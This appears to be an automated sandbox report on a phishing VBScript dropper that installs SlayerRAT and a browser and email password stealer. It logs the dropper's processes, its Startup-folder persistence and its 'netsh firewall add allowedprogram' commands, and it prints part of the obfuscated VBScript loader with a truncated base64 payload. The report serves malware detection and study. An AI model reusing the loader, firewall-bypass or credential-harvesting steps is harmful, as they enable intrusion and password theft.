            Source: Tmp.exe.0.dr, SlayerRAT.csBase64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
            Source: servieda.exe.1.dr, SlayerRAT.csBase64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
            Source: 1.0.Tmp.exe.1d0000.0.unpack, SlayerRAT.csBase64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
            Source: 1.2.Tmp.exe.1d0000.0.unpack, SlayerRAT.csBase64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
            Source: d4c6a6df7bab3dad31763de990c4ed82.exe.3.dr, SlayerRAT.csBase64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
            Source: 3.2.servieda.exe.a0000.0.unpack, SlayerRAT.csBase64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
            Source: 3.0.servieda.exe.a0000.0.unpack, SlayerRAT.csBase64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
            Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, SlayerRAT.csBase64 encoded string: 'wAyqsW4eE9Csd0dndY1rLnufPtO4Vjp9cRvXz0g38RaWjeoo1OBXT0CNp4wW7vY4Ti6Sm64zhnEn0QWHcVTGZrnNHcc9JFDNGAPYCzPWwyDPIDBsdg067E8newVoWRj7TON9roebC3m0iW9oGJ73CM4UelTtjctQvxt2QqpXATVVvAKpibp7qcoiRV9Vmves42mYUI42'
            Source: classification engineClassification label: mal100.phis.troj.adwa.spyw.evad.winVBS@22/17@5/5
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeCode function: 2_2_0498268E AdjustTokenPrivileges,
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeCode function: 2_2_04982657 AdjustTokenPrivileges,
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_02CC54FA AdjustTokenPrivileges,
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_02CC54C3 AdjustTokenPrivileges,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_0040ED0B FindResourceA,SizeofResource,LoadResource,LockResource,
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\codigo[1].txtJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4860:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:956:120:WilError_01
            Source: C:\Users\user\AppData\Roaming\servieda.exeMutant created: \Sessions\1\BaseNamedObjects\d4c6a6df7bab3dad31763de990c4ed82
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\Tmp.exeJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\PaymentNotification.vbs'
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Users\user\AppData\Roaming\servieda.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Roaming\servieda.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Users\user\AppData\Roaming\servieda.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSystem information queried: HandleInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
            Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: PaymentNotification.vbsVirustotal: Detection: 12%
            Source: PaymentNotification.vbsReversingLabs: Detection: 17%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\PaymentNotification.vbs'
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Tmp.exe 'C:\Users\user\AppData\Local\Temp\Tmp.exe'
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\pgr.exe 'C:\Users\user\AppData\Local\Temp\pgr.exe'
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeProcess created: C:\Users\user\AppData\Roaming\servieda.exe 'C:\Users\user\AppData\Roaming\servieda.exe'
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Roaming\servieda.exe' 'servieda.exe' ENABLE
            Source: C:\Windows\System32\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\pgr.exe' 'pgr.exe' ENABLE
            Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe'
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe 'C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe'
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess created: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe 'C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe'
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Tmp.exe 'C:\Users\user\AppData\Local\Temp\Tmp.exe'
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\pgr.exe 'C:\Users\user\AppData\Local\Temp\pgr.exe'
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeProcess created: C:\Users\user\AppData\Roaming\servieda.exe 'C:\Users\user\AppData\Roaming\servieda.exe'
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\pgr.exe' 'pgr.exe' ENABLE
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe 'C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe'
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess created: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe 'C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe'
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Roaming\servieda.exe' 'servieda.exe' ENABLE
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeFile opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dll
            Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, tmpFB21.tmp.exe.2.dr
            Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, tmpFB21.tmp.exe.2.dr
            Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr
            Source: Binary string: mscorrc.pdb source: tmpFB21.tmp.exe, 0000000D.00000002.613320606.00000000058C0000.00000002.00000001.sdmp

            Data Obfuscation:

            barindex
            Detected unpacking (overwrites its own PE header)Show sources
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeUnpacked PE file: 1.2.Tmp.exe.1d0000.0.unpack
            Source: C:\Users\user\AppData\Roaming\servieda.exeUnpacked PE file: 3.2.servieda.exe.a0000.0.unpack
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeUnpacked PE file: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack
            VBScript performs obfuscated calls to suspicious functionsShow sources
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Sleep(5000)Dim shadow,devpoint,members,ramadanDim ShaDevset hfhejotgbhzlzyohafchtul = createobject("wscript.shell")ShaDev = hfhejotgbhzlzyohafchtul.ExpandEnvironmentStrings("%TEMP%")Set shadow=CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")Set members=CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")shadow.dataType="bin.base64"members.dataType="bin.base64"'--------------------------------shadow.text="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAE4FhmAAAAAAAAAAAOAAAgELAQgAAAgBAAAGAAAAAAAATiYBAAAgAAAAAAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAQAAAgAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAPQlAQBXAAAAAEABAAAEAAAAAAAAAAAAAAAAAAAAAAAAAGABAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAVAYBAAAgAAAACAEAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAAAEAAAAQAEAAAQAAAAKAQAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGABAAACAAAADgEAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAwJgEAAAAAAEgAAAACAAUA3LwAABhpAAABAAAAWQAABiS8AAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACYCKAEAAAoAACoAACoAAigFAAAKAAAqANJzBwAACoABAAAEcwgAAAqAAgAABHMJAAAKgAMAAARzCgAACoAEAAAEcwsAAAqABQAABAAqAAAAEzABABAAAAABAAARAH4BAAAEbwwAAAoKKwAGKhMwAQAQAAAAAgAAEQB+AgAABG8NAAAKCisABioTMAEAEAAAAAMAABEAfgMAAARvDgAACgorAAYqEzABABAAAAAEAAARAH4EAAAEbw8AAAoKKwAGKhMwAQAQAAAABQAAEQB+BQAABG8QAAAKCisABiobMAQAFAEAAAYAABEAAowGAAAbLBIPAP4WBgAAG28VAAAKLQMWKwEXABMEEQQ55gAAAH4GAAAEFP4BFv4BEwURBSwzfgYAAATQBgAAGygWAAAKbxcAAAoTBhEGLBZyAQAAcBaNEwAAASgYAAAKcxkAAAp6ACsLAHMaAAAKgAYAAAQAfgYAAATQBgAAGygWAAAKFG8bAAAKAAAoAQAAKwrefd5ydQ8AAAElLQQmFisWJQwoHQAACghvHgAAChT+ARb+ARb+A/4RJnI7AABwF40TAAABDQkWCG8eAAAKbx8AAAqiAAkoGAAACgsHCG8eAAAKcyAAAAp6KCEAAAreFwB+BgAABNAGAAAbKBYAAApvIgAACgDcACsFAAIKKwEABioBHAAAAQCNAAq7ADeXAAAAAgCNAGXyABcAAAAAEzACAB8AAAAHAAARAAP+FgYAABtvIwAACgADEgD+FQYAABsGgQYAABsAKgAqAAIoJAAACgAAKgATMAIAEgAAAAgAABEAAgMoJQAACigmAAAKCisABioAABMwAQAMAAAACQAAEQACKCcAAAoKKwAGKhMwAQAQAAAACgAAEQDQBQAAAigWAAAKCisABioTMAEADAAAAAsAABEAAigoAAAKCisABioTMAIAEgAAAAgAABEAAgMoJQAACigmAAAKCisABioAABMwAQAMAAAACQAAEQACKCcAAAoKKwAGKhMwAQAQAAAACgAAEQDQBgAAAigWAAAKCisABioTMAEADAAAAAsAABEAAigoAAAKCisABioTMAIAIAAAAAwAABEAAowGAAAbFP4BCwcsCigBAAArCisIKwUAAgorAQAGKhMwAgASAAAABwAAEQADEgD+FQYAABsGgQYAABsAKgAAKgACKCQAAAoAACoAEzACACYAAAANAAARAH4rAAAKjAgAABsU/gELBywKKAIAACuAKwAACn4rAAAKCisABioAACoAAigkAAAKAAAqADJzNgAABoAJAAAEACoAAAAmAigkAAAKAAAqAAATMAIAtQMAAA4AABEAcnEAAHAoLQAAChMTFhMSKxQRExESmgoGby4AAAoAERIX1hMSABESEROOt/4EEzYRNi3ecoEAAHAoLQAAChMVFhMUKxYRFREUmhMKEQpvLgAACgARFBfWExQAERQRFY63/gQTNhE2LdxykwAAcCgtAAAKExcWExYrFhEXERaaEwsRC28uAAAKABEWF9YTFgARFhEXjrf+BBM2ETYt3HKnAABwKC0AAAoTGRYTGCsWERkRGJoTDBEMby4AAAoAERgX1hMYABEYERmOt/4EEzYRNi3ccrsAAHAoLQAAChMbFhMaKxYRGxEamhMNEQ1vLgAACgARGhfWExoAERoRG463/gQTNhE2LdxyzQAAcCgtAAAKEx0WExwrFhEdERyaEw4RDm8uAAAKABEcF9YTHAARHBEdjrf+BBM2ETYt3HLhAABwKC0AAAoT
            .NET source code contains potential unpackerShow sources
            Source: Tmp.exe.0.dr, SlayerRAT.cs.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: servieda.exe.1.dr, SlayerRAT.cs.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 1.0.Tmp.exe.1d0000.0.unpack, SlayerRAT.cs.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 1.2.Tmp.exe.1d0000.0.unpack, SlayerRAT.cs.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 79c06ef4ef423d882819c4e66285ec85.exe.2.dr, OK.cs.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 2.2.pgr.exe.80000.0.unpack, OK.cs.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 2.0.pgr.exe.80000.0.unpack, OK.cs.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: d4c6a6df7bab3dad31763de990c4ed82.exe.3.dr, SlayerRAT.cs.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.2.servieda.exe.a0000.0.unpack, SlayerRAT.cs.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.servieda.exe.a0000.0.unpack, SlayerRAT.cs.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, SlayerRAT.cs.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_00403C3D LoadLibraryA,GetProcAddress,strcpy,
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeCode function: 2_2_00085021 push cs; ret
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeCode function: 12_2_006E2A66 push 0000003Eh; retn 0000h
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeCode function: 12_2_006E4122 push eax; ret
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeCode function: 12_2_006E2F81 push eax; ret
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeCode function: 12_2_006E7196 push cs; iretd
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_00910712 push eax; ret
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_00910712 push eax; ret
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_008EBA9D push eax; ret
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_008EBA9D push eax; ret
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_0102A16B push cs; retf
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_0102A083 push cs; retf
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_0102A0F7 push cs; retf
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_00411879 push ecx; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_004118A0 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_004118A0 push eax; ret
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeFile created: C:\Users\user\AppData\Roaming\servieda.exeJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\Tmp.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exeJump to dropped file
